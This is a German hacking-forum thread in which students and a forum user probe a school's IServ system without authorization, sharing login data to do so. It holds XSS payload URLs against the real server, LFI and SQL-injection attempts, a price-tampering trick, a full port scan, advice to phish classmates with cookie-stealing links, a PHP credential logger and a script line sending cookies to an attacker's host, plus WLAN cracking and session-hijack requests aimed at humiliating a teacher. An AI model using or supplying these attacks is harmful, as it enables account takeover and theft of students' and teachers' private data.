Es ist: 03.09.2014, 07:56 Hallo, Gast! (AnmeldenRegistrierenSicherer Login)


Antwort schreiben 
29.01.2009, 15:38 (Dieser Beitrag wurde zuletzt bearbeitet: 15.08.2010 12:37 von FlaggeXL.)
Beitrag: #1
Iser "knacken"
Hey Leute!

Ich wollte euch mal fragen, ob es möglichkeiten gibt, als Nichtadmin an Passwörter oder sonstiges zu kommen.

In unserer ( und in vielen anderen Schulen) wird das System "Iserv" verwendet (http://xxx.de)

(Mehr Infos über das System: http://iserv.eu/ )

So..Und nun wollte ich wissen, ob ich da i-welche Sachen machen kann, wie z.B. Passwörter ändern, oder sonstiges. Unter anderem könnte ich mich dann in andere Acc einloggen ( wer hätte das gedacht :P) und Sachen ausdrucken, da jeder Schüler nur begrenzt Druckguthaben zur Verfügung bekommt. Außerdem könnte ich E-Mail und Dateien lesen.

Gibt es da irgendeine Möglichkeit? Wäre sehr nett, wenn Ihr mir helfen könntet!

Viele Grüße Marvin1993

________________________________________
Kannst du diese Frage mit "nein" beantworten?
Alle Beiträge dieses Benutzers finden
Diese Nachricht in einer Antwort zitieren
29.01.2009, 15:51
Beitrag: #2
Iser "knacken"
Zitat:So..Und nun wollte ich wissen, ob ich da i-welche Sachen machen kann, wie z.B. Passwörter ändern, oder sonstiges.
Evt. von dir selbst, ja^^

Bestimmt, irgenteine Möglichkeit gibt es immer.

Ich würde mir das System gerne mal von innen ansehen. Schickst du mir bitte eine PM mit gültigen Zugangsdaten? Natürlich werde ich nichts ändern, bin ja trusted genug glaube ich ;)

Gruß nobody :)

Everywhere is a bug. You just have to search and see it.
[Bild: nbyed342.jpg]
Alle Beiträge dieses Benutzers finden
Diese Nachricht in einer Antwort zitieren
29.01.2009, 15:59
Beitrag: #3
Iser "knacken"
Du meinst meine Logindaten?

Ja, aber du darfst wirklich nichts machen ...Weil da auch manche Aktionen von der Schulfirma drüber laufen :D:D

________________________________________
Kannst du diese Frage mit "nein" beantworten?
Alle Beiträge dieses Benutzers finden
Diese Nachricht in einer Antwort zitieren
29.01.2009, 18:49
Beitrag: #4
Iser "knacken"
Hallo,

Also erstmal muss ich sagen: Danke für die Logindaten :D

^^ nein Spaß beseite.

Ich habe mal gegoogelt, nachdem ich einige Sicherheitslücken gefunden habe, da ich sehen wollte ob evt. die Version veraltet ist, oder ob die Software viel attackiert wird.. konnte nur leider nichts brauchbares
finden. Ging es dir auch so?

Irgentwie erschreckend, wie leicht es ging, Sicherheitslücken zu finden.

Hier eine "kleine" Liste:

Zitat:Email send:

* E-Mail/Gesendet
* "123silljSADF@igschule-ohz.de; djlsak"@igschule-ohz.de
Fehler: 550 5.1.1 <"123silljSADF@igschule-ohz.de; djlsak"@igschule-ohz.de>... User unknown


XSS:
[url=http://anonym.to/http://anonym.to/http://anonym.to/http://anonym.to/http://www.igschule-ohz.de/idesk/msg/find.php?path=%3Cimg%20src=%22jdls%22%20onError=alert%281%29%3E]http://www.igschule-ohz.de/idesk/msg/find.php?path=%3Cimg%20src=%22jdls%22%20onError=alert(1)%3E[/url]
http://www.igschule-ohz.de/idesk/info/stat/chart.php?name=../../admin/log/stat/day&title=%22%3E%3C/a%3E%3CscrIPT%3Ealert(1)%3C/scrIPT%3E%27
http://www.igschule-ohz.de/idesk/info/stat/chart.php?name=%27%3E%3C/a%3E%3CscrIPT%3Ealert(1)%3C/scrIPT%3E%22
http://www.igschule-ohz.de/idesk/file/?l=%22%3E%3C/a%3E%3CscrIPT%3Ealert(1)%3C/scrIPT%3E%27
http://www.igschule-ohz.de/idesk/chat/?room=%27-%22%3E%3C/a%3E%3CscrIPT%3Ealert(1)%3C/scrIPT%3E%27b&type=group
http://www.igschule-ohz.de/idesk/calendar/index.php?scale=3&order=begin&sort=AS%27&datetoshow=%22%3E%3C/a%3E%3CscrIPT%3Ealert(1)%3C/scrIPT%3E%27
http://www.igschule-ohz.de/idesk/calendar/index.php?scale=%22%3E%3C/a%3E%3CscrIPT%3Ealert(1)%3C/scrIPT%3E%27&order=begin&sort=ASC&datetoshow=1233243563
http://www.igschule-ohz.de/idesk/print/output.php?file=Temp%2FMicrosoft+Word+-+Dokument1+9.ps&dev=%22%3E%3C/a%3E%3CscrIPT%3Ealert(1)%3C/scrIPT%3E%27&cost=0


Server vulnerable?
Apache/1.3.27 Server at www.igschule-ohz.de Port 80


Information Gathering:
http://www.igschule-ohz.de/idesk/msg/msg.php?INBOX/9999
Warning: imap_header(): Bad message number in /opt/iserv/idesk/msg/inc/tools.inc on line 17
Warning: imap_fetchstructure(): Bad message number in /opt/iserv/idesk/msg/inc/tools.inc on line 27

=============================================================================
Dr.Web® Scanner für Windows v4.44.5 (4.44.5.08080)
© Igor Daniloff, 1992-2008. Alle Rechte vorbehalten.
Log erstellt am: 2008-11-24, 14:09:08 [IGSPC022][xxx]
Kommandozeile: "C:\Programme\DrWeb\drweb32w.exe"
Betriebssystem: Windows XP Professional x86 (Build 2600), Service Pack 2
=============================================================================
Dieses Programm wurde mit limitierten Zugriffserlaubnissen gestartet. Nicht alle Dateien darf man scannen oder desinfizieren.
Man braucht Administratorkonto-Erlaubnisse zum Zugang auf allen Dateien.
Engine-Version: 4.44 (4.44.0.09170)
API-Version: 2.02
...

http://www.igschule-ohz.de/idesk/chat/?room=Spunk-b&type=group%27

http://www.igschule-ohz.de/idesk/print/seldev.php?file=%27
Warning: filemtime(): Stat failed for /home/xxx/' (errno=2 - Datei oder Verzeichnis nicht gefunden) in /opt/iserv/idesk/inc/sio.inc on line 39
a:3:{s:3:"ver";i:1;s:4:"name";s:1:"'";s:4:"time";b:0;}
Error while running '/opt/iserv/idesk/print/seldev.inc' with user 'dein-username' (0).
Invalid directory: /home/xxx/../../../../../../../../../../../../../../../../etc/passwd.cache
Error while running '/opt/iserv/idesk/print/seldev.inc' with user 'dein-username' (0).
-> NOCH CHECKEN AUF LFI!

http://www.igschule-ohz.de/idesk/file/?l=%22%3E%3C/a%3E%3CscrIPT%3Ealert(1)%3C/scrIPT%3E%27 -> gleiches Problem: ../

Session auf ' or 1=1 -- geändert:
Warning: session_register(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in /opt/iserv/idesk/inc/share.inc on line 57
Warning: session_register(): Cannot send session cache limiter - headers already sent (output started at /opt/iserv/idesk/inc/share.inc:57) in /opt/iserv/idesk/inc/share.inc on line 57
Warning: Unknown(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in Unknown on line 0
Warning: Unknown(): Failed to write session data (files). Please verify that the current setting of session.save_path is correct (/var/iserv/sessions) in Unknown on line 0


Lfi (unter Umständen interessant):
http://www.igschule-ohz.de/idesk/info/stat/chart.php?name=../../../../../../../../../../../../etc/passwd


Directory listening on:
http://www.igschule-ohz.de/idesk/admin/

Whats that?:
http://www.igschule-ohz.de/idesk/addr/detail.php?mode=p&oid=210429-1


Account Brute Force:
Kein Captcha eingebaut und anscheinend auch keine beschränkung der Versuche. Desweiteren Login-Name Brute Force: Bei falschen Username: Account existiert nicht!


Client Site Attack:
http://www.igschule-ohz.de/idesk/print/seldev.php?file=Temp/Microsoft+Word+-+Dokument1+9.ps
Dir ging es doch um das kostenlose drucken, richtig? Ich habe mir die URL angesehen und die sah doch wirklich verdächtig aus. cost=5. Es kostet 5 Cent. Versuche es doch mal auf cost=0 zu ändern ;)

Orginal:
http://www.igschule-ohz.de/idesk/print/output.php?file=Temp%2FMicrosoft+Word+-+Dokument1+9.ps&dev=HP_CLJ_3800DN&cost=5

Geändert:
http://www.igschule-ohz.de/idesk/print/output.php?file=Temp%2FMicrosoft+Word+-+Dokument1+9.ps&dev=HP_CLJ_3800DN&cost=0

Ich habs nicht getestet, aber könnte mir gut vorstellen, dass das ganze nur Clientseitig und nicht mehr im Script überprüft wird. Somit - have fun! -> Aber Achtung: Nicht zu oft anwenden, sonst wird es noch
gepacht! Das ist immer die wichtigste Regel ;)


SQL-Injection:
Hab nur etwas herumprobiert, sieht mir etwas komplizierter aus: http://www.igschule-ohz.de/idesk/addr/list.php?mode=p&search=1&field[0]=name&content[0]=&field[1]=nickname&content[1]=&field[2]=if((1=2),(select%201%20union%20select%201,2),5)&content[2]=celine

Und hier alle Kategorien:
http://www.igschule-ohz.de/idesk/calendar/index.php?scale=3&&order=begin&category_filter[0]=1%22%20and%201=1%20--%20f&category_filter[]=6&category_filter[]=12&category_filter[]=7&category_filter[]=4&category_filter[]=8&category_filter[]=5&category_filter[]=6&category_filter[]=10&category_filter[]=11&filter=123


Meine Ideen:
Irgentwie kam ich gerade auf die Idee, http://www.igschule-ohz.de/idesk/addr/detail.php?mode=p&oid=210429&reload die oid zu ändern (kleines Script...). Evt. lassen sich andere Einträge auslesen.
Nur damit ich nicht falsch liege:
Die Schule hat einen Server bei einem Hoster in Bremen. Auf diesen könnt ihr von daheim (oder sonst wo) per idesk zugreifen. Dazu braucht ihr eben eueren Accountlogin, der für euch eingerichtet wurde und das Passwort,
ist klar.
Der Server von dene läuft offenbar auf Windows XP Prof (siehe oben).

FTP-Zugriff habt ihr auch, da es eingerichtet wurde (Account + Passwort), auch klar. Aber nun kommt die Frage:
Ich sehe beim FTP Ordner wie Desktop, Netzwerkumgebung, Eigene Dateien, etc. typisch für Windows.

Meldest du dich etwa in der Schule im IT Unterricht auch an diesen Server an?

Werden eigentlich mehrere Server verwendet oder ist das der einzige? (Nein, ich bin nicht neugierig nur wissen möchte ich alles^^ sonst hacke ich nicht gerne, wenn ich nicht bescheid weiß ;))

Btw: Das Lied ist geil, das man unter deinen FTP Login downloaden kann (YMCA)^^ :D

Also wenn meine Vermutung richtig ist, dann heißt dass das man mit Root-Rechten auf den Server alle Daten offen liegen hat o_________o

ftp://igschule-ohz.de/Profile/Cookies/ --> bei jedem User cookie stehlen, Netzwerk sniffen, Account Daten, Proxy hochladen, Vom Server auf scannen, Daten von den Lehrern, etc. etc. etc.

//edit: Hat man unter http://www.igschule-ohz.de/idesk/file/?l= auch fast sovie Zugriff wie wenn man auf den FTP verbindet?^^ Irgentwie unlogisch, oder?

Und nun sei freundlich und melde diese Liste unter: http://www.igschule-ohz.de/idesk/fehler/index.php ^^ :D

//Anmerkung: Ich checke eben noch mit Nmap etwas. Edit folgt ;)

Nmap:
Zitat:C:\Programme\nmap-4.76>nmap -v --version-all -O -A -p 1-65535 82.198.200.41

Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-29 18:52 Westeuropõische Norma
lzeit
Initiating Ping Scan at 18:52
Scanning 82.198.200.41 [2 ports]
Completed Ping Scan at 18:52, 0.75s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:52
Completed Parallel DNS resolution of 1 host. at 18:52, 6.50s elapsed
Initiating SYN Stealth Scan at 18:52
Scanning 82-198-200-41.briteline.de (82.198.200.41) [65535 ports]
Discovered open port 22/tcp on 82.198.200.41
Discovered open port 80/tcp on 82.198.200.41
Discovered open port 21/tcp on 82.198.200.41
Discovered open port 443/tcp on 82.198.200.41
Discovered open port 25/tcp on 82.198.200.41
Increasing send delay for 82.198.200.41 from 0 to 5 due to 131 out of 435 ****pe
d probes since last increase.
Discovered open port 7778/tcp on 82.198.200.41
Discovered open port 8890/tcp on 82.198.200.41
Discovered open port 79/tcp on 82.198.200.41
Discovered open port 32774/tcp on 82.198.200.41
Discovered open port 635/tcp on 82.198.200.41
Discovered open port 27665/tcp on 82.198.200.41
Discovered open port 5900/tcp on 82.198.200.41
Discovered open port 5742/tcp on 82.198.200.41
Discovered open port 32772/tcp on 82.198.200.41
Discovered open port 31337/tcp on 82.198.200.41
Discovered open port 20034/tcp on 82.198.200.41
Discovered open port 54320/tcp on 82.198.200.41
Discovered open port 1080/tcp on 82.198.200.41
Discovered open port 6666/tcp on 82.198.200.41
Discovered open port 12346/tcp on 82.198.200.41
Discovered open port 40421/tcp on 82.198.200.41
Discovered open port 540/tcp on 82.198.200.41
Discovered open port 49724/tcp on 82.198.200.41
Discovered open port 5454/tcp on 82.198.200.41
Discovered open port 723/tcp on 82.198.200.41
Discovered open port 32771/tcp on 82.198.200.41
Discovered open port 5656/tcp on 82.198.200.41
Discovered open port 6667/tcp on 82.198.200.41
Discovered open port 6000/tcp on 82.198.200.41
Discovered open port 2000/tcp on 82.198.200.41
Discovered open port 263/tcp on 82.198.200.41
Discovered open port 119/tcp on 82.198.200.41
Discovered open port 7777/tcp on 82.198.200.41
Discovered open port 5901/tcp on 82.198.200.41
Discovered open port 5902/tcp on 82.198.200.41
Discovered open port 8888/tcp on 82.198.200.41
Discovered open port 222/tcp on 82.198.200.41
Discovered open port 11/tcp on 82.198.200.41
Discovered open port 9999/tcp on 82.198.200.41
Discovered open port 143/tcp on 82.198.200.41
Discovered open port 111/tcp on 82.198.200.41
Discovered open port 283/tcp on 82.198.200.41
Discovered open port 110/tcp on 82.198.200.41
Discovered open port 15/tcp on 82.198.200.41
Discovered open port 3388/tcp on 82.198.200.41
Discovered open port 8889/tcp on 82.198.200.41
Completed SYN Stealth Scan at 19:18, 1586.70s elapsed (65535 total ports)
Initiating Service scan at 19:18
Scanning 46 services on 82-198-200-41.briteline.de (82.198.200.41)
Completed Service scan at 19:22, 239.58s elapsed (46 services on 1 host)
Initiating OS detection (try #1) against 82-198-200-41.briteline.de (82.198.200.
41)
Retrying OS detection (try #2) against 82-198-200-41.briteline.de (82.198.200.41
)
Initiating Traceroute at 19:22
82.198.200.41: no reply to our hop distance probe!
Completed Traceroute at 19:24, 100.02s elapsed
SCRIPT ENGINE: Initiating script scanning.
Initiating SCRIPT ENGINE at 19:24
SCRIPT ENGINE Timing: About 41.94% done; ETC: 19:25 (0:00:41 remaining)
Completed SCRIPT ENGINE at 19:26, 137.88s elapsed
Host 82-198-200-41.briteline.de (82.198.200.41) appears to be up ... good.
Interesting ports on 82-198-200-41.briteline.de (82.198.200.41):
Not shown: 64491 closed ports, 998 filtered ports
PORT STATE SERVICE VERSION
11/tcp open tcpwrapped
15/tcp open tcpwrapped
21/tcp open ftp?
|_ FTP bounce check: no banner
22/tcp open ssh?
25/tcp open smtp Sendmail 8.12.11.20060308/8.12.11
79/tcp open finger?
80/tcp open http?
|_ HTML title: Site doesn't have a title.
110/tcp open pop3?
111/tcp open rpcbind?
119/tcp open tcpwrapped
143/tcp open imap?
222/tcp open rsh-spx?
263/tcp open unknown
283/tcp open unknown
443/tcp open https?
|_ HTML title: Site doesn't have a title.
540/tcp open uucp?
635/tcp open unknown?
723/tcp open omfs?
1080/tcp open socks?
2000/tcp open callbook?
3388/tcp open unknown?
5454/tcp open unknown
5656/tcp open unknown
5742/tcp open unknown
5900/tcp open vnc?
5901/tcp open vnc-1?
5902/tcp open vnc-2?
6000/tcp open X11?
6666/tcp open irc?
6667/tcp open irc?
7777/tcp open unknown?
7778/tcp open unknown?
8888/tcp open sun-answerbook?
8889/tcp open unknown?
8890/tcp open unknown
9999/tcp open abyss?
12346/tcp open netbus?
20034/tcp open unknown
27665/tcp open Trinoo_Master?
31337/tcp open Elite?
32771/tcp open sometimes-rpc5?
32772/tcp open sometimes-rpc7?
32774/tcp open sometimes-rpc11?
40421/tcp open unknown
49724/tcp open unknown
54320/tcp open bo2k?
No OS matches for host
Service Info: Host: igschule-ohz.de; OS: Unix

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
! maximum TTL reached (50)

Read data files from: C:\Programme\nmap-4.76
OS and Service detection performed. Please report any incorrect results at http:
//nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2082.98 seconds
Raw packets sent: 69332 (3.055MB) | Rcvd: 64929 (2.650MB)

Gruß nobody :)

Everywhere is a bug. You just have to search and see it.
[Bild: nbyed342.jpg]
Alle Beiträge dieses Benutzers finden
Diese Nachricht in einer Antwort zitieren
29.01.2009, 19:27 (Dieser Beitrag wurde zuletzt bearbeitet: 30.01.2009 14:33 von FlaggeXL.)
Beitrag: #5
Iser "knacken"
Wenn ich das umstelle auf 0 geht das nicht dann kommt diese Meldung:

Fehler in der Druckkostenberechnung. Bitte versuchen Sie es erneut!

Auch andere Beträge gehen nicht..Nur der Betrag, der ausgerechnet wurde -.-

So...Welche Fragen hattest du noch so..Mal sehen^^

Also, ja, wir können uns von überalle, wo wir Internetzugang haben anmelden.

Ja, wenn wir an den Computern sind, oder dran wollen, müssen wir uns auch mit diesen Daten anmelden, sonst kommen wir nicht an den Pc

Hmm..Was heißt der einzigste Server...Also ich glaube, dass in der Igs (meine Schule)selber auch einer ist..Ich bin mir aber nciht so sicher...

Ja, das Lied ist wirklich gut^^ Mussten dir ein Referat drüber machen :P

Mit den Rootrechnern denke ich mal schon, dass da alle Daten offen sind, ich bin mir aber nicht sicher :P

Aber bei Jedem die Cookies stehlen..Keine Ahnung, wie ich das machen soll..Wenn ich ein Programm draufmache, kann wahrscheinlich nur ich das öffnen, oder das Programm wird gelöscht...Außerdem habe ich keine Adminrechte.

Und mit einem Script, ich weiß ja nicht..Also es wird nicht Jeder meinen Link anklicken...Also denke ich mal nicht, dass das klappt^^ Oder hast du sonst noch eine Idee?

Ja, also wenn ich Daten z.B. auf meine "Homepage" hochlade, also in diesen Ordner, wird das auch so angezeigt, wie eine FTP-Server -.-

Und was meinst du mit die Liste melden?

Ok, mach das^^

Soo..Das war´s erstmal^^ Ich hoffe, ich habe alle deine Fragen beantwortet^^

Viele Grüße Marvin

Ps: Vielen vielen Dank

Pps: Bitte sag mir noch, wie ich die Lücken ausnutzen kann.

Achja und könnte ich mir auch mehr Rechte beschaffen?

Viele Grüße Marvin

Oder Passwörter von anderen ändern das wäre cool :P




________________________________________
Kannst du diese Frage mit "nein" beantworten?
Alle Beiträge dieses Benutzers finden
Diese Nachricht in einer Antwort zitieren
29.01.2009, 19:46
Beitrag: #6
Iser "knacken"
Zitat: Auch andere Beträge gehen nicht..Nur der Betrag, der ausgerechnet wurde -.-
Dann wird es wohl doch Serverseitig noch gecheckt, verdammt ^^

Zitat: Pps: Bitte sag mir noch, wie ich die Lücken ausnutzen kann.
Das einfachste wäre wohl XSS. Guck dir ein paar Tuts an. Einfach deinen "Freunden" den Link schicken und auf den Stealer weiterleiten, z. B.

Zitat: Und was meinst du mit die Liste melden?
Du sollst die Lücken nun schön brav den Administrator deiner Schule melden ;)

Gruß nobody :)

Everywhere is a bug. You just have to search and see it.
[Bild: nbyed342.jpg]
Alle Beiträge dieses Benutzers finden
Diese Nachricht in einer Antwort zitieren
29.01.2009, 20:00 (Dieser Beitrag wurde zuletzt bearbeitet: 15.08.2010 12:43 von FlaggeXL.)
Beitrag: #7
Iser "knacken"
Nene^^ Der wird von den Lücken nie erfahren :D:D

//Edit:

Ich habe XSS verstanden, aber ich weiß nicht, wie die Daten an meinen FTP-Server kommen -.-

Viele Grüße Marvin

________________________________________
Kannst du diese Frage mit "nein" beantworten?
Alle Beiträge dieses Benutzers finden
Diese Nachricht in einer Antwort zitieren
29.01.2009, 20:05
Beitrag: #8
Iser "knacken"
Zitat: Ich habe XSS verstanden, aber ich weiß nicht, wie die Daten an meinen FTP-Server kommen -.-
Dann haste nicht richtig gelesen.

Also für mich ist es eigentlich mehr oder weniger erledigt.

Nur würde mich noch interessieren, wer die SQL-Injection und die LFI hinbekommt.
Serverdienste scheinen auch ganz interessant zu sein, nur habe ich nicht recht lust zumzuspielen.

Falls jemand Lust hat, kann er das ja gerne tun. Würde mich freuen, weil ich bekomme die SQL Abfrage und LFI nicht hin.

Gruß nobody :)

Everywhere is a bug. You just have to search and see it.
[Bild: nbyed342.jpg]
Alle Beiträge dieses Benutzers finden
Diese Nachricht in einer Antwort zitieren
29.01.2009, 20:44
Beitrag: #9
Iser "knacken"
Und ich weiß nichtmal, was das ist :D:D

Oh man^^ Aber ich mache erstmal XSS und ich denke ich habe es verstanden:

Also wenn ich da z.b. eine cookies.php anlege wo das drinne steht:

<?php
header ('Location: http://www.pennergame.de');
&handle = fopen("Pass.txt", "a");
foreach(&_POST as §variable => &value( {
fwrite(&handle, &variable);
fwrite(&handle, " = ");
fwrite(&handle, &value);
fwrite(&handle, "\r\n");
}
fwrite(&handle, "\r\n");
fclose(&handle);
exit;
?>

Und das script so aussieht:

<script>document.location='http://xxx.xx.funpic.de/cookies.php?cookie='+document.cookie</script>

Dann müsste das doch gehen, oder?
Hää? Wo das denn? da steht doch nur http://www.pannergame.de und die Seite gehört mir nicht^^

Und bei Funpic steht doch xxx.xx und so :D:D

Was willst du denn jetzt von mir?:D:D

Viele Grüße Marvin1993
Ok^^ Aber die haben ja nicht die Passwörter und so...Wie sollen die da rankommen^^

Also hacken, ist klar^^ Aber als ob sich Jdm. soeine Arbeit macht um nichts vorzufinden :D:D

Da ist eh noch nichts drauf^^

Naja...Danke aber trotzdem

Viele Grüße Marvin

Ps: Bin jetzt off^^ Schönheitsschlaf :P

________________________________________
Kannst du diese Frage mit "nein" beantworten?
Alle Beiträge dieses Benutzers finden
Diese Nachricht in einer Antwort zitieren
30.01.2009, 16:11
Beitrag: #10
Iser "knacken"
Zitat: Der Schuladmin kennt sich eh nicht mit Computern aus :P...Der denkt das nur immer!
Vermutlich mehr wie du wenn ich mir deine Fragen so ansehe ;)

Ich überlege gerade den Admin eine Mail zu schreiben... aber bin wohl z. Z. zu faul. Aber evt. packt mich ja die Lust noch, wenn ich noch eine dumme Frage in diesem Thread sehe.

Gruß nobody :)

Everywhere is a bug. You just have to search and see it.
[Bild: nbyed342.jpg]
Alle Beiträge dieses Benutzers finden
Diese Nachricht in einer Antwort zitieren
30.01.2009, 16:56
Beitrag: #11
Iser "knacken"
Also Marvin, ich entferne das sehr gern aus dem Quote vorher muss ich aber noch eins machen was ich mir echt nicht verkneifen kann:

Also Wer ist Marvin1993:



Name: XXXXX XXXXXX
Geburtsdatum: XX.XX.XXXX
ICQ: XXX-XXX-XXX
MSN: --------------
SVZ: --------------

Wohnhaft vermutlich in der Gegend: XXXXXXXX

Also ganz ehrlich Jung,,,,der Link in deiner Signatur also naja ich weiss ja nicht.... wollte dir nur mal auf meine freunliche Art und Weise aufzeigen das es recht sinnlos ist wenn ich nur meine Post editiere, sondern das du alleine durch deine Sig schon alles preisgibst....

MFG

PS: Ich editiere natürlich gern wenn du deine Sig änderst, oder halt hier sagst das es dir egal ist, was aus dem vorherigen Post ja eher nicht hervorging ;-)

EDIT: Alle "sensiblen" Daten entfernt ;-)

Diese Nachricht in einer Antwort zitieren
28.09.2009, 17:33
Beitrag: #12
RE: Iser "knacken"
Oh, ich habe mir das Forum gerade mal durchgelesen, was ich ja gestartet hatte.

Meine Güte, ich hatte ja von nichts ne Ahnung! Ich konnte ja nichtmal die einfachsten Sachen machen. Jetzt habe ich wenigstens ein bisschen mehr Ahnung, und kenne mich auch gut mit HTML aus, was vorher auch nicht soo wirklich der Fall war. Und wo ich mir das im Nachhinneim durchlese, bin ich nciht besser gewesen, als diese Kiddy´s, die immer nur alles wissen wollen, aber für alles zu faul sind. ich habe zwar viele Sachen ausprobiert, aber wenn ich gescheitert bin nicht immer genau genug geguckt, was ich denn falsch mache.

So, also ich weiß nicht, ob nochmal jemand Lust hat, selber (Dieses Mal ohne meine Logindaten ;) ) Fehler, oder Sicherheitslücken zu suchen. Das System wird bei uns im Umkreis an sehr sehr vielen Schulen genutzt, was ich aber garnicht verstehe, da es wirklich sehr viele Lücken enthält.

mit dem lehrer, das nehme ich auch zurück, er hat Ahnung, aber nicht so viel. Es gibt zwei Administratoren und der eine ( den ich meinte) war/ist nur für den Inhalt verantwortlich und der andere für die ganzen Technischen Sachen.

Hiermit möchte ich Noboby nochmal recht herzlihc Danken, das er sich "so lieb um mich gekümmert hat" oder es in anderen Worten auszudrücken, mir geholfen hat, Sicherheitslücken zu finden und mir ein bisschen zu erklären (versucht hat) wie ich solche Lücken ausnutzen kann.

Da ich jetzt sehr viel HTML benutze, habe ich jetzt mehr Ahnung, wie alles aufgebaut ist und wie sich das mit dem FTP zusammensetzt. Also jetzt wären erst die "Grundkenntnisse" vorhanden, um da anzufangen, wo ich aufgehört habe. Im Moment habe ich keine Zeit, mich mit dieser Materrie "noch mal" auseinander zu setzen, da ich jetzt dabei bin, Abi zu machen.

Trotzdem vielen Dank für eure Unterstüzung!

Viele Grüße Marvin

________________________________________
Kannst du diese Frage mit "nein" beantworten?
Alle Beiträge dieses Benutzers finden
Diese Nachricht in einer Antwort zitieren
17.01.2010, 21:11
Beitrag: #13
RE: Iser "knacken"
So der Thread ist zwar nun ein bisschen älter, ich grabe ihn mal kurz aus. :)
Erstmal Halli Hallo an alle.

Also ich bin dabei unseren Infolehrer bisschen zu erniedrigen.
( Der hat mich auf dem kieker )
Naja, Unser WLAN Netz ist WPA2 geschützt, hab aber schon das PW aus einem "Medienwagen" geholt.
Bin ins Netz, hatte eine Internetsperre, da mein Laptop nich im Netz angemeldet war.
Dank Mac-Spoofing hatt ich das dann auch im Griff.
Nun gehts ans letzte Problem. Das IServ an sich.
Ich hatte nicht wirklich vor da was böses mit anzustellen.
Ich wollte ihm aber dennoch zeigen wer hier wen nun fertig macht.
( Immerhin hat er mir auf dem Zeugnis ne 4- geben wollen, obwohl ich mündlich 3-4 war und in der Arbeit 2+, da kann ja etwas nicht stimmen )
Naja und nun zu meinem eigentlichen Problem.

Ich hab hier schön alles gelesen. Und hab letztenendes herausbekommen, dass
IServ mit PHPSESSID arbeitet.
Gut und soweit ich weiß, werden die ja quasi dann als Cookie benutzt.
Und zuerst hatte ich mir etwas wie : <script>jvoid(document.cookie="username=Admin")</script>
gedacht, aber das geht ja leider wie gesagt nicht.
Meine Frage kann man da noch irgendwie etwas reißen.
Denn ( habe schon Ahnung von PHP ) meines Wissens nach werden die ja "generiert" und dann immer wieder neu zugeteilt...
Und dieses neu zugeteilt stellt für mich das Problem dar, da ich nicht weiß, wie ich das dann ausnutzen könnte.
Bitte um Hilfe

Alle Beiträge dieses Benutzers finden
Diese Nachricht in einer Antwort zitieren
18.01.2010, 00:50
Beitrag: #14
IServ
(17.01.2010 23:01)0x30 schrieb:  
Zitat:Ich wollte ihm aber dennoch zeigen wer hier wen nun fertig macht.
( Immerhin hat er mir auf dem Zeugnis ne 4- geben wollen, obwohl ich mündlich 3-4 war und in der Arbeit 2+, da kann ja etwas nicht stimmen )
Dann redet man darüber.

ja das hab ich auch, nur das Die Email nicht ganz freundlich war( noten kamen per email )
und kann mir nun wer Helfen ?
bzw, ich hab keine ahnung von Javascript aber soviel ich weiß müsste man doch per
<script>jvoid(document.cookie="PHPSESSID=blaaa")</script>

die PHPSessid ändern können.
Hab das mit nem Kumpel Testweise probiert doch da rührte sich nichts.
Jemand ne Idee? bzw den Fehler erkannt? =D

Alle Beiträge dieses Benutzers finden
Diese Nachricht in einer Antwort zitieren
Antwort schreiben 


Möglicherweise verwandte Themen...
Thema: Verfasser Antworten: Ansichten: Letzter Beitrag
  WLAN-Knacken mit Geforce und Radeon black_Lotus 1 5.000 07.03.2009 13:31
Letzter Beitrag: x0red
  Netzwerk Password knacken FlaggeXL 32 13.187 05.02.2009 18:52
Letzter Beitrag: nobody
  [S] Mit der Psp w-lan knacken!? Ewaxy 11 5.095 08.01.2009 22:22
Letzter Beitrag: pHySSiX
  Router knacken Huskynarr 9 4.493 30.11.2008 18:26
Letzter Beitrag: nobody

Gehe zu:


© Back2Hack.cc | Powered by MyBB | Design by Cwis | Top | RSS | Kontakt